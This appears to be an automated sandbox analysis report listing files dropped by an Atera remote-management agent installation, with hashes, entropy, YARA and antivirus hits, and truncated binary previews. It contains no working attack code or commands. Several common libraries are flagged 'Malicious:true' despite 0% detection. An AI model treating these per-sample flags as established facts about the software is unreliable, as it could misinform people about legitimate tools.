                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?><ArrayOfKeyValueOfanyTypeanyType xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:x="http://www.w3.org/2001/XMLSchema" z:Id="1" z:Type="System.Collections.Hashtable" z:Assembly="0" xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><LoadFactor z:Id="2" z:Type="System.Single" z:Assembly="0" xmlns="">0.72</LoadFactor><Version z:Id="3" z:Type="System.Int32" z:Assembly="0" xmlns="">2</Version><Comparer i:nil="true" xmlns="" /><HashCodeProvider i:nil="true" xmlns="" /><HashSize z:Id="4" z:Type="System.Int32" z:Assembly="0" xmlns="">3</HashSize><Keys z:Id="5" z:Type="System.Object[]" z:Assembly="0" z:Size="2" xmlns=""><anyType z:Id="6" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">_reserved_nestedSavedStates</anyType><anyType z:Id="7" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/20

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):145968
                                                                                                                                                                                                                                        Entropy (8bit):5.874150428357998
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
                                                                                                                                                                                                                                        MD5:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                        SHA1:E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
                                                                                                                                                                                                                                        SHA-256:A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                                                                                                                                                                                                                        SHA-512:23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..e.........."...0.............f$... ...@....@.. ...............................1....`..................................$..O....@..,...............0(...`......."............................................... ............... ..H............text...|.... ...................... ..`.rsrc...,....@......................@..@.reloc.......`......................@..B................H$......H.......(...D4..........l!..p.............................................{....*.0..N........~......,.~.....+:(.......~....(........(....#.......@....,.(.....+.~.....+..*...0..;........(.......(.....1.(.......(........+....,.~.....+.~.....+..*..0..6........~....%-.&~..........s....%.....s ......o!.....o"....*...0..O........(...........~#...r...po$..........,..rG..ps%...z.rO..p.....(&....~.....o'....*..0..>........~#...r...po(............,'.~#...r...po$............,.rG..ps%...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1442
                                                                                                                                                                                                                                        Entropy (8bit):5.076953226383825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
                                                                                                                                                                                                                                        MD5:B3BB71F9BB4DE4236C26578A8FAE2DCD
                                                                                                                                                                                                                                        SHA1:1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
                                                                                                                                                                                                                                        SHA-256:E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
                                                                                                                                                                                                                                        SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3318832
                                                                                                                                                                                                                                        Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                        MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                        SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                        SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                        SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R............" ..0..r2..........&1.. ....2...... ........................2.....i.3...@.................................G&1.O.....2..............|2.0(....2.....X.(.p............................................ ............... ..H............text....p2.. ...r2................. ..`.rsrc.........2......t2.............@..@.reloc........2......z2.............@..B................{&1.....H...........$....................(.....................................V!........s.........*.~....-*(....o....o....o.........~....-.~.........~....*..( ...*...0..G.......(!....o"....s.1....s*,..%..(.... ....o.....o 0...Zo....t....o8(..(....*..0..$..........(.....(....o.....(!.......io#...*z...(....(!....o"...o....(....*..0............T....r...p.(O....o$....(....*..0..I.......sG...sB)..s.(..s.(...(....s6(....,..o%....2...(....sV(....+.....%..ox...*..( ...*V.(&.....}......}..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):215088
                                                                                                                                                                                                                                        Entropy (8bit):6.030864151731967
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                        MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                        SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                        SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                        SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............" ..0..............'... ...@....... ....................................`..................................'..O....@..t............ ..0(...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`......................@..B.................'......H........... ...................$&........................................( ...*"..(!...*&...("...*&...(#...*2.r...p(....*"..(....*&...(....*&...(....*2.rE..p(....*"..(....*&...(....*&...(....*2.r...p(....*"..(....*&...(....*&...(....*J..r...p($...(....*v....(%.....(%.....(%...(....*....L...%...%.r...p.%...%.r...p.%....%.r+..p.%...(&...(....*..(....*&...(....*&...(....*.0..)........{.........('...t......|......(...+...3.*....0..)........{.........()...t......|......(...+...3.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                        MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                        SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                        SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                        SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ......J.....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1966298
                                                                                                                                                                                                                                        Entropy (8bit):7.9989725851892
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:24576:HELBDnMsmlLa7SwvAQAQI3/ehJQmjJaLbjvQInz96/pU7jy5EFgxivT9rnzvDbOU:kJMJig3/ekmlQjvQQLUNxqrzrmniuxa
                                                                                                                                                                                                                                        MD5:B110BA42CA8D339B18293AC3F1E94F03
                                                                                                                                                                                                                                        SHA1:E21AC41D052159076B34823D2653DB0DECDF7F8C
                                                                                                                                                                                                                                        SHA-256:C860712A06A55CDDDFED7A9F86F0DF36DA1E475B9901148D07D5B02331BA0F77
                                                                                                                                                                                                                                        SHA-512:D81EFA032F3FF5EDC247440CFF1E911A82230B757C02534209FEAD7ECF630FE5308F9A32A78CC229F175CB447735D539EB61039BFB4FF9F8E77B8DBCCDA2B0BA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK........@BrX................Agent.Package.Watchdog/PK........0BrXG...>.......7...Agent.Package.Watchdog/Agent.Package.Watchdog.deps.json.6.J.U.,..{..d.....7......#L..I.....L.PB.=...H.^Hnw....tq.!Ym.w.%@'.I.Xa...6|...@.z.V+C...o.Nu...!*..t....4..A...l..$....KX....p..&......?g..*..../.....I..(...U..g.4..BD.......i.J.+:........'..8...n.~j..,.[....Z.@l...t...d......9.X..8e..=..?..`....V>.......@A..D.........~. \:H..9..p.+...\.PGT8......~...AJ....... ..E...X..RJ.9.v.....;.i.#C.._..d.c.z..:....m....5..*...7....Jx...T....b.z..p.0f...8..ya..p6..ns.K,X.t...`{.j.....N..^.....A.....'n....ES...y.8b.....?Cg...}.......mjEg'.!Zs.,..o..3...~,E\........s..\.<.T..("..qMG)7f))X..x..Y..R..........k........z.r..[X..P....w....).k,.[.X[..4.z.)..Cy.e.D{.V|J.u..W..Bk[...<.o.@L.. .....s-.*..)....E].y'.....r....pQl^O..#......S.R.4.].b..E..e.i.:O..g..k...*...4..5...:. .."..y./....U....2......?.\C.....a...COlQ...XE....j..j........X...1...6.o.j.W....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.deps.json

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):39359
                                                                                                                                                                                                                                        Entropy (8bit):5.001117795800814
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Yt5DUarXaaec21v5Oc5/MNXP4RBTEQ88jnfA:YvDUarXaaecC5Oc5/mXP4TTEuA
                                                                                                                                                                                                                                        MD5:B4CB4604F8C7F02757664874D862DD77
                                                                                                                                                                                                                                        SHA1:6FDB3AEBCEAAFBCFE21333DA021DCD96F8B78B7B
                                                                                                                                                                                                                                        SHA-256:54289873BCDBAD889E6304E7E1B21D5973BBDD0E1AA73BD19382CFA23713D1CE
                                                                                                                                                                                                                                        SHA-512:46C27C62CE35512643EE023630A264BFBE1CA41B18BA44E1659B3AF26C0A44E3ABA73D7B90DB77835A76CEE33035791887B722348AA98CB2C4CC9B32F30CEF01
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:{.. "runtimeTarget": {.. "name": ".NETCoreApp,Version=v6.0",.. "signature": "".. },.. "compilationOptions": {},.. "targets": {.. ".NETCoreApp,Version=v6.0": {.. "Agent.Package.Watchdog/1.5": {.. "dependencies": {.. "Atera.Agent.Package.Infrastructure": "1.2.4",.. "Atera.Agent.Package.Tools": "1.0.22",.. "System.ServiceProcess.ServiceController": "8.0.0",.. "TaskScheduler": "2.10.1".. },.. "runtime": {.. "Agent.Package.Watchdog.dll": {}.. }.. },.. "Atera.Agent.Package.Infrastructure/1.2.4": {.. "dependencies": {.. "Microsoft.Extensions.Hosting": "7.0.1",.. "Newtonsoft.Json": "13.0.3",.. "Polly": "7.2.3",.. "Serilog.Extensions.Hosting": "5.0.1",.. "Serilog.Sinks.File": "5.0.0".. },.. "runtime": {.. "lib/net6.0/Atera.Agent.Package.Infrastructure.dll": {.. "assemblyVersion": "1.2.4.0",.. "fileVe

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):35920
                                                                                                                                                                                                                                        Entropy (8bit):6.456207579215664
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:kj2zXcZGQ2FEagbbE9xEHCC+ud1VEpYinAMxCin:4YCauE9xc+K1O7HxF
                                                                                                                                                                                                                                        MD5:1E283F1A342729D63266E2DD2C851E2F
                                                                                                                                                                                                                                        SHA1:47B2551B2F9C3E9E6F2D68E67B1E0D0A539F315E
                                                                                                                                                                                                                                        SHA-256:98CE24EFC2EF680BFCD5D98E3AC273B148B0828D256ADBA003F57F66E1EC7FC4
                                                                                                                                                                                                                                        SHA-512:BD84EDA89C91DFEFBAEB6EA952A3BAF2EDBDBCDAB08B5A4437DB2A1F21F82A7BDDBDE9C12C00FEC8CD99FCE75CD945D189EED083BD0AD77DB00353B631DD5D20
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^-............"...0..Z..........2y... ........@.. ...............................r....`..................................x..O....................d..P(...........x............................................... ............... ..H............text...8Y... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B.................y......H.......84...D............................................................{....*..{....*..{....*..{....*..{....*..{....*..(......}......}......}.......}.......}.......}....*....0...........u.......;.....9....(.....{.....{....o....,w(.....{.....{....o....,_( ....{.....{....o!...,G("....{.....{....o#...,/($....{.....{....o%...,.(&....{.....{....o'...*.*.*..0.......... ...9 )UU.Z(.....{....o(...X )UU.Z(.....{....o)...X )UU.Z( ....{....o*...X )UU.Z("....{....o+...X )UU.Z($....{..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):159824
                                                                                                                                                                                                                                        Entropy (8bit):6.224052560324469
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:5czkitvo4BpYN/6mBPry8TXROLdW5m4mUR39OOGu0kpNY:5A4NCmBPry/N2jOOHS
                                                                                                                                                                                                                                        MD5:0B7534A49A757D7525F7FC966D6CAF5F
                                                                                                                                                                                                                                        SHA1:2548A8D4BFE81D194A42A6DF1761AB910DECCBCA
                                                                                                                                                                                                                                        SHA-256:312755B522A3CB212A2D5E0DF2888699C35DE233A2DC198C37475E2BF414B0A1
                                                                                                                                                                                                                                        SHA-512:4D3105E7669093DF8364543571D839D0FD573153EED27D82860984797FB30853C3F5FB7707BF97442D4AB71783012FBBB3D9AB1A2D6ACBEA335F06B756FD4796
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}.............../......./......./.....a.....S../........"...I../....I../....Rich............................PE..d......e..........".................`<.........@..........................................`.................................................t$...............`..@....H..P(..............T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data........@......................@....pdata..@....`.......&..............@..@_RDATA...............<..............@..@.reloc...............>..............@..B.rsrc................B..............@..@........................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                        Entropy (8bit):3.7004397181410926
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhUkov:Wtov
                                                                                                                                                                                                                                        MD5:4F935A094C5DB43100C1C6191F1D2257
                                                                                                                                                                                                                                        SHA1:D35F739210BF40D4E936975C00BF90F015DA6847
                                                                                                                                                                                                                                        SHA-256:01AC8D880AA7CB47A4C9475593AC81924D0D51CEB9C3276BA11F5848AFA05FE1
                                                                                                                                                                                                                                        SHA-512:C60461AE0FE1DF07D67FC55012DCDA8E2615DBCEAA885EE1DB9FB2E4FCF71990730FBFA10300A957D8E1908D1B9FA61A36A665ED63C934E07958DC73606C5AF3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=1.5..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.runtimeconfig.json

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):253
                                                                                                                                                                                                                                        Entropy (8bit):4.585549446641918
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:3Hp/hdNyhAkI/XCkyFNOJeZS1sHZeQ6NOCUo+K8EkNTy:dFkp5MeU1s5hex+K8Es2
                                                                                                                                                                                                                                        MD5:24E4653829DE1022D01CD7DDD26E2F22
                                                                                                                                                                                                                                        SHA1:9160A009CB381E044BA4C63E4435DA6BFEB9DC6D
                                                                                                                                                                                                                                        SHA-256:DED3AEB5856A11DB0B654A785574490CAB55839EBFB17EFE9E39B89618FC5B91
                                                                                                                                                                                                                                        SHA-512:EFD4BBBA1BAEC0B47003831510E3AA539DB9EF468E0F06BA9D7BA6D0B3800035F7C818D7D90171BFD377EC97D08C4617555BCFF635DD83EFCEB412B1A9CCA820
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:{.. "runtimeOptions": {.. "tfm": "net6.0",.. "framework": {.. "name": "Microsoft.NETCore.App",.. "version": "6.0.0".. },.. "configProperties": {.. "System.Reflection.Metadata.MetadataUpdater.IsSupported": false.. }.. }..}

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Infrastructure.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):53840
                                                                                                                                                                                                                                        Entropy (8bit):6.300468155319662
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:4dUSqld/oh93y+UR4ULL4L88EKNoo9sXQqt9EpYinAMxCQr:4d2P/phL4L8KGo9sgqt27Hxb
                                                                                                                                                                                                                                        MD5:355567F26142F9101526CB91F98FB03D
                                                                                                                                                                                                                                        SHA1:B7D5B6C9D78A4C7F4775F79F68B640D2E90DF1E0
                                                                                                                                                                                                                                        SHA-256:6D81FB3829261543D93FF02BF239BD25A39E41DCB645381F0A8C9D53E8694A68
                                                                                                                                                                                                                                        SHA-512:C72ADB068410D53C085BC5DEA0CADB6D2C55603566923C12547CA2D897D1F238F706BD1F7A046E97A8A21C95DB4B97EE70A32BD559437508B65887686CDBE6A3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#.(..........." ..0.................. ........... ..............................B.....`.................................X...O.......t...............P(..........P...T............................................ ............... ..H............text........ ...................... ..`.rsrc...t...........................@..@.reloc..............................@..B........................H........I...t............................................................{....*..{....*..{....*r.(......}......}......}....*....0..Y........u........L.,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o....*.*.*....0..K....... M.. )UU.Z(.....{....o....X )UU.Z(.....{....o....X )UU.Z(.....{....o ...X*..0...........r...p......%..{.......%q.........-.&.+.......o!....%..{.......%q.........-.&.+.......o!....%..{.......%q.........-.&.+.......o!....("...*..(#...*^.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Tools.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):66640
                                                                                                                                                                                                                                        Entropy (8bit):6.273913453163328
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:PO4QNCMhTIDWo+hDbEicjIeoCtU1a1ZTG/2u2Xv2vFbanu5fEpYinAMxCIiO:xQTIywi3eobgTG/2u2/wb0u5Y7HxwO
                                                                                                                                                                                                                                        MD5:90916CE0E528B775C1179E96F86CA200
                                                                                                                                                                                                                                        SHA1:6F64812C50EC9E6672CB088903F913168F35430A
                                                                                                                                                                                                                                        SHA-256:BB828056E376EF41E40F212FB6AD2990227CBCF821D4835263180C4768795249
                                                                                                                                                                                                                                        SHA-512:EB027447FB79E3E0A397EF173205596C8DFA936C9CB0F88B9A27ADFBB0F3E1B4E28F18FC907F3BFF2C4A39BB03B8131A5998E90F2BA60E4F522B7BF36D1C18BD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|.t..........." ..0.................. ........... .......................@......)T....`.....................................O.......................P(... ..........T............................................ ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........_...............................................................(....*^.(.......J...%...}....*:.(......}....*:.(......}....*...0..T........(....(....,..(...+&.(...+&.(...+&(....,..(...+&.(...+&(....,..(...+&.(...+&.(...+&*.0...........(....&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&*".(...+&*".(...+&*".(...+&*.(....*.(....*..(....*j(.....%-.&~....(....o....*j(.....%-.&~....o ...(!...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\CliWrap.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):186448
                                                                                                                                                                                                                                        Entropy (8bit):6.958336672022744
                                                                                                                                                                                                                                        Encrypted:false
